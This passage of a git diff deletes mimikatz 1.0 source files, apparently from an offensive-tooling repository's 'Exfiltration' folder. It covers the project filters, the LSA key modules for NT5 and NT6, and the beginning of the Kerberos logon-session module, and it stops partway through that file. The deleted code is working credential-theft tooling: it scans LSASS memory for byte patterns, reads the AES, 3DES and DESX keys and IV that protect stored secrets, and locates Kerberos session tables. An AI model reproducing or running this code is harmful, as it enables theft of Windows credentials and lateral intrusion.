mimikatz\Impersonate</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_handle.cpp"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_text.cpp"> - <Filter>Modules Communs\Texte</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_hash.cpp"> - <Filter>Modules Communs\Certificats & Clés</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_hash.cpp"> - <Filter>Modules locaux pour mimikatz\Certificats & Clés</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_windows.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_minesweeper.cpp"> - <Filter>Modules locaux pour mimikatz\Démineur</Filter> - </ClCompile> - <ClCompile Include="modules\Security Packages\wdigest.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClCompile> - <ClCompile Include="modules\Security Packages\kerberos.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClCompile> - <ClCompile Include="modules\Security Packages\tspkg.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClCompile> - <ClCompile Include="modules\Security Packages\livessp.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClCompile> - <ClCompile Include="modules\Security Packages\msv1_0.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_sekurlsa.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_process.cpp"> - <Filter>Modules locaux pour mimikatz\System</Filter> - </ClCompile> - <ClCompile Include="modules\mod_mimikatz_efs.cpp"> - <Filter>Modules locaux pour mimikatz\Certificats & Clés</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_minidump.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="..\modules\mod_winsta_desktop.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - <ClCompile Include="modules\Security Packages\ssp.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA\Security Packages</Filter> - </ClCompile> - <ClCompile Include="modules\LSA Keys\keys_nt5.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA\LSA Keys</Filter> - </ClCompile> - <ClCompile Include="modules\LSA Keys\keys_nt6.cpp"> - <Filter>Modules locaux pour mimikatz\SekurLSA\LSA Keys</Filter> - </ClCompile> - <ClCompile Include="global.cpp" /> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="mimikatz.rc" /> - </ItemGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.cpp deleted file mode 100644 index 9b51c7f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.cpp +++ /dev/null @@ -1,76 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "keys_nt5.h" -#include "..\..\global.h" -PBYTE * mod_mimikatz_sekurlsa_keys_nt5::g_pRandomKey = NULL, * mod_mimikatz_sekurlsa_keys_nt5::g_pDESXKey = NULL; - -#ifdef _M_X64 -BYTE PTRN_WNT5_LsaInitializeProtectedMemory_KEY[] = {0x33, 0xdb, 0x8b, 0xc3, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0xc3}; -LONG OFFS_WNT5_g_pRandomKey = -(6 + 2 + 5 + sizeof(long)); -LONG OFFS_WNT5_g_cbRandomKey = OFFS_WNT5_g_pRandomKey - (3 + sizeof(long)); -LONG OFFS_WNT5_g_pDESXKey = OFFS_WNT5_g_cbRandomKey - (2 + 5 + sizeof(long)); -LONG OFFS_WNT5_g_Feedback = OFFS_WNT5_g_pDESXKey - (3 + 7 + 6 + 2 + 5 + 5 + sizeof(long)); -#elif defined _M_IX86 -BYTE PTRN_WNT5_LsaInitializeProtectedMemory_KEY[] = {0x84, 0xc0, 0x74, 0x44, 0x6a, 0x08, 0x68}; -LONG OFFS_WNT5_g_Feedback = sizeof(PTRN_WNT5_LsaInitializeProtectedMemory_KEY); -LONG OFFS_WNT5_g_pRandomKey = OFFS_WNT5_g_Feedback + sizeof(long) + 5 + 2 + 2 + 2; -LONG OFFS_WNT5_g_pDESXKey = OFFS_WNT5_g_pRandomKey+ sizeof(long) + 2; -LONG OFFS_WNT5_g_cbRandomKey = OFFS_WNT5_g_pDESXKey + sizeof(long) + 5 + 2; -#endif - -bool mod_mimikatz_sekurlsa_keys_nt5::searchAndInitLSASSData() -{ - PBYTE ptrBase = NULL; - DWORD mesSucces = 0; - if(mod_memory::searchMemory(mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr, mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr + mod_mimikatz_sekurlsa::localLSASRV.modBaseSize, PTRN_WNT5_LsaInitializeProtectedMemory_KEY, &ptrBase, sizeof(PTRN_WNT5_LsaInitializeProtectedMemory_KEY))) - { -#ifdef _M_X64 - PBYTE g_Feedback = reinterpret_cast<PBYTE >((ptrBase + OFFS_WNT5_g_Feedback) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT5_g_Feedback)); - g_pRandomKey = reinterpret_cast<PBYTE *>((ptrBase + OFFS_WNT5_g_pRandomKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT5_g_pRandomKey)); - g_pDESXKey = reinterpret_cast<PBYTE *>((ptrBase + OFFS_WNT5_g_pDESXKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT5_g_pDESXKey)); - PDWORD g_cbRandomKey = reinterpret_cast<PDWORD >((ptrBase + OFFS_WNT5_g_cbRandomKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT5_g_cbRandomKey)); -#elif defined _M_IX86 - PBYTE g_Feedback = *reinterpret_cast<PBYTE *>(ptrBase + OFFS_WNT5_g_Feedback); - g_pRandomKey = *reinterpret_cast<PBYTE **>(ptrBase + OFFS_WNT5_g_pRandomKey); - g_pDESXKey = *reinterpret_cast<PBYTE **>(ptrBase + OFFS_WNT5_g_pDESXKey); - PDWORD g_cbRandomKey = *reinterpret_cast<PDWORD *>(ptrBase + OFFS_WNT5_g_cbRandomKey); -#endif - *g_Feedback = NULL; *g_pRandomKey = NULL; *g_pDESXKey = NULL; *g_cbRandomKey = NULL; - - mesSucces = 0; - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (g_Feedback - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), g_Feedback, 8, mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(g_cbRandomKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), g_cbRandomKey, sizeof(DWORD), mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(g_pRandomKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), &ptrBase, sizeof(PBYTE), mod_mimikatz_sekurlsa::hLSASS)) - { - mesSucces++; - *g_pRandomKey = new BYTE[*g_cbRandomKey]; - if(mod_memory::readMemory(ptrBase, *g_pRandomKey, *g_cbRandomKey, mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - } - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(g_pDESXKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), &ptrBase, sizeof(PBYTE), mod_mimikatz_sekurlsa::hLSASS)) - { - mesSucces++; - *g_pDESXKey = new BYTE[144]; - if(mod_memory::readMemory(ptrBase, *g_pDESXKey, 144, mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - } - } - else (*outputStream) << L"mod_memory::searchMemory NT5 " << mod_system::getWinError() << endl; - return (mesSucces == 6); -} - -bool mod_mimikatz_sekurlsa_keys_nt5::uninitLSASSData() -{ - if(g_pRandomKey && *g_pRandomKey) - delete[] *g_pRandomKey; - if(g_pDESXKey && *g_pDESXKey) - delete[] *g_pDESXKey; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.h deleted file mode 100644 index 121d9c5..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt5.h +++ /dev/null @@ -1,17 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_keys_nt5 { - -private: - static PBYTE *g_pRandomKey, *g_pDESXKey; -public: - static bool searchAndInitLSASSData(); - static bool uninitLSASSData(); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.cpp deleted file mode 100644 index ac642ef..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.cpp +++ /dev/null @@ -1,186 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` -http://blog.gentilkiwi.com -benjamin@gentilkiwi.com -Licence : http://creativecommons.org/licenses/by/3.0/fr/ -Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "keys_nt6.h" -#include "..\..\global.h" -HMODULE mod_mimikatz_sekurlsa_keys_nt6::hBCrypt = NULL; -PBYTE mod_mimikatz_sekurlsa_keys_nt6::AESKey = NULL, mod_mimikatz_sekurlsa_keys_nt6::DES3Key = NULL; -mod_mimikatz_sekurlsa_keys_nt6::PKIWI_BCRYPT_KEY * mod_mimikatz_sekurlsa_keys_nt6::hAesKey = NULL, * mod_mimikatz_sekurlsa_keys_nt6::h3DesKey = NULL; -BCRYPT_ALG_HANDLE * mod_mimikatz_sekurlsa_keys_nt6::hAesProvider = NULL, * mod_mimikatz_sekurlsa_keys_nt6::h3DesProvider = NULL; - -BYTE kiwiRandom3DES[24], kiwiRandomAES[16]; - -#ifdef _M_X64 -BYTE PTRN_WNO8_LsaInitializeProtectedMemory_KEY[] = {0x83, 0x64, 0x24, 0x30, 0x00, 0x44, 0x8B, 0x4C, 0x24, 0x48, 0x48, 0x8B, 0x0D}; -LONG OFFS_WNO8_hAesKey = sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY) + sizeof(LONG) + 5 + 3; -LONG OFFS_WN61_h3DesKey = - (2 + 2 + 2 + 5 + 3 + 4 + 2 + 5 + 5 + 2 + 2 + 2 + 5 + 5 + 8 + 3 + sizeof(long)); -LONG OFFS_WN61_InitializationVector = OFFS_WNO8_hAesKey + sizeof(long) + 3 + 4 + 5 + 5 + 2 + 2 + 2 + 4 + 3; -LONG OFFS_WN60_h3DesKey = - (6 + 2 + 2 + 5 + 3 + 4 + 2 + 5 + 5 + 6 + 2 + 2 + 5 + 5 + 8 + 3 + sizeof(long)); -LONG OFFS_WN60_InitializationVector = OFFS_WNO8_hAesKey + sizeof(long) + 3 + 4 + 5 + 5 + 2 + 2 + 6 + 4 + 3; - -BYTE PTRN_WIN8_LsaInitializeProtectedMemory_KEY[] = {0x83, 0x64, 0x24, 0x30, 0x00, 0x44, 0x8B, 0x4D, 0xD8, 0x48, 0x8B, 0x0D}; -LONG OFFS_WIN8_hAesKey = sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY) + sizeof(LONG) + 4 + 3; -LONG OFFS_WIN8_h3DesKey = - (6 + 2 + 2 + 6 + 3 + 4 + 2 + 4 + 5 + 6 + 2 + 2 + 6 + 5 + 8 + 3 + sizeof(long)); -LONG OFFS_WIN8_InitializationVector = OFFS_WIN8_hAesKey + sizeof(long) + 3 + 4 + 5 + 6 + 2 + 2 + 6 + 4 + 3; -#elif defined _M_IX86 -BYTE PTRN_WNO8_LsaInitializeProtectedMemory_KEY[] = {0x8B, 0xF0, 0x3B, 0xF3, 0x7C, 0x2C, 0x6A, 0x02, 0x6A, 0x10, 0x68}; -LONG OFFS_WNO8_hAesKey = -(5 + 6 + sizeof(long)); -LONG OFFS_WNO8_h3DesKey = OFFS_WNO8_hAesKey - (1 + 3 + 3 + 1 + 3 + 2 + 1 + 2 + 2 + 2 + 5 + 1 + 1 + 3 + 2 + 2 + 2 + 2 + 2 + 5 + 6 + sizeof(long)); -LONG OFFS_WNO8_InitializationVector = sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY); - -BYTE PTRN_WIN8_LsaInitializeProtectedMemory_KEY[] = {0x8B, 0xF0, 0x85, 0xF6, 0x78, 0x2A, 0x6A, 0x02, 0x6A, 0x10, 0x68}; -LONG OFFS_WIN8_hAesKey = -(2 + 6 + sizeof(long)); -LONG OFFS_WIN8_h3DesKey = OFFS_WIN8_hAesKey - (1 + 3 + 3 + 1 + 3 + 2 + 2 + 2 + 2 + 2 + 2 + 2 + 1 + 3 + 2 + 2 + 2 + 2 + 2 + 2 + 6 + sizeof(long)); -LONG OFFS_WIN8_InitializationVector = sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY); -#endif - -bool mod_mimikatz_sekurlsa_keys_nt6::searchAndInitLSASSData() -{ - if(!hBCrypt) - hBCrypt = LoadLibrary(L"bcrypt"); - - PBYTE PTRN_WNT6_LsaInitializeProtectedMemory_KEY; - ULONG SIZE_PTRN_WNT6_LsaInitializeProtectedMemory_KEY; - LONG OFFS_WNT6_hAesKey, OFFS_WNT6_h3DesKey, OFFS_WNT6_InitializationVector; - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - PTRN_WNT6_LsaInitializeProtectedMemory_KEY = PTRN_WNO8_LsaInitializeProtectedMemory_KEY; - SIZE_PTRN_WNT6_LsaInitializeProtectedMemory_KEY = sizeof(PTRN_WNO8_LsaInitializeProtectedMemory_KEY); - OFFS_WNT6_hAesKey = OFFS_WNO8_hAesKey; -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - OFFS_WNT6_h3DesKey = OFFS_WN60_h3DesKey; - OFFS_WNT6_InitializationVector = OFFS_WN60_InitializationVector; - } - else - { - OFFS_WNT6_h3DesKey = OFFS_WN61_h3DesKey; - OFFS_WNT6_InitializationVector = OFFS_WN61_InitializationVector; - } -#elif defined _M_IX86 - OFFS_WNT6_h3DesKey = OFFS_WNO8_h3DesKey; - OFFS_WNT6_InitializationVector = OFFS_WNO8_InitializationVector; -#endif - } - else - { - PTRN_WNT6_LsaInitializeProtectedMemory_KEY = PTRN_WIN8_LsaInitializeProtectedMemory_KEY; - SIZE_PTRN_WNT6_LsaInitializeProtectedMemory_KEY = sizeof(PTRN_WIN8_LsaInitializeProtectedMemory_KEY); - OFFS_WNT6_hAesKey = OFFS_WIN8_hAesKey; - OFFS_WNT6_h3DesKey = OFFS_WIN8_h3DesKey; - OFFS_WNT6_InitializationVector = OFFS_WIN8_InitializationVector; - } - - PBYTE ptrBase = NULL; - DWORD mesSucces = 0; - if(mod_memory::searchMemory(mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr, mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr + mod_mimikatz_sekurlsa::localLSASRV.modBaseSize, PTRN_WNT6_LsaInitializeProtectedMemory_KEY, &ptrBase, SIZE_PTRN_WNT6_LsaInitializeProtectedMemory_KEY)) - { -#ifdef _M_X64 - LONG OFFS_WNT6_AdjustProvider = (mod_system::GLOB_Version.dwBuildNumber < 8000) ? 5 : 4; - PBYTE InitializationVector = reinterpret_cast<PBYTE >((ptrBase + OFFS_WNT6_InitializationVector) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_InitializationVector)); - hAesKey = reinterpret_cast<PKIWI_BCRYPT_KEY *>((ptrBase + OFFS_WNT6_hAesKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_hAesKey)); - h3DesKey = reinterpret_cast<PKIWI_BCRYPT_KEY *>((ptrBase + OFFS_WNT6_h3DesKey) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_h3DesKey)); - hAesProvider = reinterpret_cast<BCRYPT_ALG_HANDLE *>((ptrBase + OFFS_WNT6_hAesKey - 3 - OFFS_WNT6_AdjustProvider -sizeof(long)) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_hAesKey - 3 - OFFS_WNT6_AdjustProvider -sizeof(long))); - h3DesProvider = reinterpret_cast<BCRYPT_ALG_HANDLE *>((ptrBase + OFFS_WNT6_h3DesKey - 3 - OFFS_WNT6_AdjustProvider -sizeof(long)) + sizeof(long) + *reinterpret_cast<long *>(ptrBase + OFFS_WNT6_h3DesKey - 3 - OFFS_WNT6_AdjustProvider -sizeof(long))); -#elif defined _M_IX86 - PBYTE InitializationVector = *reinterpret_cast<PBYTE * >(ptrBase + OFFS_WNT6_InitializationVector); - hAesKey = *reinterpret_cast<PKIWI_BCRYPT_KEY **>(ptrBase + OFFS_WNT6_hAesKey); - h3DesKey = *reinterpret_cast<PKIWI_BCRYPT_KEY **>(ptrBase + OFFS_WNT6_h3DesKey); - hAesProvider = *reinterpret_cast<BCRYPT_ALG_HANDLE **>(ptrBase + OFFS_WNT6_hAesKey + sizeof(PVOID) + 2); - h3DesProvider = *reinterpret_cast<BCRYPT_ALG_HANDLE **>(ptrBase + OFFS_WNT6_h3DesKey + sizeof(PVOID) + 2); -#endif - if(hBCrypt && LsaInitializeProtectedMemory()) - { - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (InitializationVector - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), InitializationVector, 16, mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - - KIWI_BCRYPT_KEY maCle; - KIWI_BCRYPT_KEY_DATA maCleData; - - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(hAesKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), &ptrBase, sizeof(PBYTE), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(ptrBase, &maCle, sizeof(KIWI_BCRYPT_KEY), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(maCle.cle, &maCleData, sizeof(KIWI_BCRYPT_KEY_DATA), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(reinterpret_cast<PBYTE>(maCle.cle) + FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), &(*hAesKey)->cle->data, maCleData.size - FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data) - 2*sizeof(PVOID), mod_mimikatz_sekurlsa::hLSASS)) // 2 pointeurs internes la fin, la structure de dpart n'tait pas inutile ;) - mesSucces++; - - if(mod_memory::readMemory(mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr + (reinterpret_cast<PBYTE>(h3DesKey) - mod_mimikatz_sekurlsa::localLSASRV.modBaseAddr), &ptrBase, sizeof(PBYTE), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(ptrBase, &maCle, sizeof(KIWI_BCRYPT_KEY), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(maCle.cle, &maCleData, sizeof(KIWI_BCRYPT_KEY_DATA), mod_mimikatz_sekurlsa::hLSASS)) - if(mod_memory::readMemory(reinterpret_cast<PBYTE>(maCle.cle) + FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), &(*h3DesKey)->cle->data, maCleData.size - FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), mod_mimikatz_sekurlsa::hLSASS)) - mesSucces++; - } - else (*outputStream) << L"LsaInitializeProtectedMemory NT6 KO" << endl; - } - else (*outputStream) << L"mod_memory::searchMemory NT6 " << mod_system::getWinError() << endl; - - return (mesSucces == 3); -} - - -bool mod_mimikatz_sekurlsa_keys_nt6::uninitLSASSData() -{ - if(hBCrypt) - { - LsaCleanupProtectedMemory(); - FreeLibrary(hBCrypt); - } - return true; -} - -bool mod_mimikatz_sekurlsa_keys_nt6::LsaInitializeProtectedMemory() -{ - bool resultat = false; - - PBCRYPT_OPEN_ALGORITHM_PROVIDER K_BCryptOpenAlgorithmProvider = reinterpret_cast<PBCRYPT_OPEN_ALGORITHM_PROVIDER>(GetProcAddress(hBCrypt, "BCryptOpenAlgorithmProvider")); - PBCRYPT_SET_PROPERTY K_BCryptSetProperty = reinterpret_cast<PBCRYPT_SET_PROPERTY>(GetProcAddress(hBCrypt, "BCryptSetProperty")); - PBCRYPT_GET_PROPERTY K_BCryptGetProperty = reinterpret_cast<PBCRYPT_GET_PROPERTY>(GetProcAddress(hBCrypt, "BCryptGetProperty")); - PBCRYPT_GENERATE_SYMMETRIC_KEY K_BCryptGenerateSymmetricKey = reinterpret_cast<PBCRYPT_GENERATE_SYMMETRIC_KEY>(GetProcAddress(hBCrypt, "BCryptGenerateSymmetricKey")); - - if(NT_SUCCESS(K_BCryptOpenAlgorithmProvider(h3DesProvider, BCRYPT_3DES_ALGORITHM, NULL, 0)) && - NT_SUCCESS(K_BCryptOpenAlgorithmProvider(hAesProvider, BCRYPT_AES_ALGORITHM, NULL, 0))) - { - if(NT_SUCCESS(K_BCryptSetProperty(*h3DesProvider, BCRYPT_CHAINING_MODE, reinterpret_cast<PBYTE>(BCRYPT_CHAIN_MODE_CBC), sizeof(BCRYPT_CHAIN_MODE_CBC), 0)) && - NT_SUCCESS(K_BCryptSetProperty(*hAesProvider, BCRYPT_CHAINING_MODE, reinterpret_cast<PBYTE>(BCRYPT_CHAIN_MODE_CFB), sizeof(BCRYPT_CHAIN_MODE_CFB), 0))) - { - DWORD DES3KeyLen, AESKeyLen, cbLen; - - if(NT_SUCCESS(K_BCryptGetProperty(*h3DesProvider, BCRYPT_OBJECT_LENGTH, reinterpret_cast<PBYTE>(&DES3KeyLen), sizeof(DES3KeyLen), &cbLen, 0)) && - NT_SUCCESS(K_BCryptGetProperty(*hAesProvider, BCRYPT_OBJECT_LENGTH, reinterpret_cast<PBYTE>(&AESKeyLen), sizeof(AESKeyLen), &cbLen, 0))) - { - DES3Key = new BYTE[DES3KeyLen]; - AESKey = new BYTE[AESKeyLen]; - - resultat = NT_SUCCESS(K_BCryptGenerateSymmetricKey(*h3DesProvider, (BCRYPT_KEY_HANDLE *) h3DesKey, DES3Key, DES3KeyLen, kiwiRandom3DES, sizeof(kiwiRandom3DES), 0)) && - NT_SUCCESS(K_BCryptGenerateSymmetricKey(*hAesProvider, (BCRYPT_KEY_HANDLE *) hAesKey, AESKey, AESKeyLen, kiwiRandomAES, sizeof(kiwiRandomAES), 0)); - } - } - } - return resultat; -} - -bool mod_mimikatz_sekurlsa_keys_nt6::LsaCleanupProtectedMemory() -{ - PBCRYTP_DESTROY_KEY K_BCryptDestroyKey = reinterpret_cast<PBCRYTP_DESTROY_KEY>(GetProcAddress(hBCrypt, "BCryptDestroyKey")); - PBCRYTP_CLOSE_ALGORITHM_PROVIDER K_BCryptCloseAlgorithmProvider = reinterpret_cast<PBCRYTP_CLOSE_ALGORITHM_PROVIDER>(GetProcAddress(hBCrypt, "BCryptCloseAlgorithmProvider")); - - if (h3DesKey ) - K_BCryptDestroyKey(*h3DesKey); - if (hAesKey ) - K_BCryptDestroyKey(*hAesKey); - - if (h3DesProvider) - K_BCryptCloseAlgorithmProvider(*h3DesProvider, 0); - if (hAesProvider ) - K_BCryptCloseAlgorithmProvider(*hAesProvider, 0); - - if(DES3Key) - delete[] DES3Key; - if(AESKey) - delete[] AESKey; - - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.h deleted file mode 100644 index 9b1940a..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/LSA Keys/keys_nt6.h +++ /dev/null @@ -1,45 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_keys_nt6 { - -private: - static HMODULE hBCrypt; - - typedef struct _KIWI_BCRYPT_KEY_DATA { - DWORD size; - DWORD tag; - DWORD type; - DWORD unk0; - DWORD unk1; - DWORD unk2; - DWORD unk3; - PVOID unk4; - BYTE data; /* etc... */ - } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA; - - typedef struct _KIWI_BCRYPT_KEY { - DWORD size; - DWORD type; - PVOID unk0; - PKIWI_BCRYPT_KEY_DATA cle; - PVOID unk1; - } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY; - - static PBYTE DES3Key, AESKey; - static PKIWI_BCRYPT_KEY * hAesKey, * h3DesKey; - static BCRYPT_ALG_HANDLE * hAesProvider, * h3DesProvider; - - static bool LsaInitializeProtectedMemory(); - static bool LsaCleanupProtectedMemory(); - -public: - static bool searchAndInitLSASSData(); - static bool uninitLSASSData(); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp deleted file mode 100644 index dae52d2..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp +++ /dev/null @@ -1,135 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "kerberos.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_kerberos::pModKERBEROS = NULL; -mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION mod_mimikatz_sekurlsa_kerberos::KerbLogonSessionList = NULL; //reinterpret_cast<mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION>(NULL); -long mod_mimikatz_sekurlsa_kerberos::offsetMagic = 0; -PRTL_AVL_TABLE mod_mimikatz_sekurlsa_kerberos::KerbGlobalLogonSessionTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL); - -bool mod_mimikatz_sekurlsa_kerberos::getKerberos(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getKerberosLogonData, wstring(L"kerberos"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_kerberos::searchKerberosFuncs() -{ -#ifdef _M_X64 - BYTE PTRN_WALL_KerbUnloadLogonSessionTable[]= {0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d}; - LONG OFFS_WALL_KerbUnloadLogonSessionTable = sizeof(PTRN_WALL_KerbUnloadLogonSessionTable); - - BYTE PTRN_WALL_KerbFreeLogonSessionList[] = {0x48, 0x3b, 0xfe, 0x0f, 0x84}; - LONG OFFS_WALL_KerbFreeLogonSessionList = -4; -#elif defined _M_IX86 - BYTE PTRN_WNO8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x1f, 0x53}; - LONG OFFS_WNO8_KerbUnloadLogonSessionTable = -(3 + 4); - BYTE PTRN_WIN8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x2b, 0x57}; // 2c au lieu de 2b pour avant le RC - LONG OFFS_WIN8_KerbUnloadLogonSessionTable = -(6 + 4); - - BYTE PTRN_WALL_KerbFreeLogonSessionList[] = {0xeb, 0x0f, 0x6a, 0x01, 0x57, 0x56, 0xe8}; - LONG OFFS_WALL_KerbFreeLogonSessionList = -4; -#endif - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModKERBEROS && !(KerbGlobalLogonSessionTable || KerbLogonSessionList)) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pointeur= reinterpret_cast<PBYTE *>(&KerbLogonSessionList); - pattern = PTRN_WALL_KerbFreeLogonSessionList; - taille = sizeof(PTRN_WALL_KerbFreeLogonSessionList); - offset = OFFS_WALL_KerbFreeLogonSessionList; - - if(mod_system::GLOB_Version.dwMinorVersion < 2) - offsetMagic = 8; - } - else - { - pointeur= reinterpret_cast<PBYTE *>(&KerbGlobalLogonSessionTable); - -#ifdef _M_X64 - pattern = PTRN_WALL_KerbUnloadLogonSessionTable; - taille = 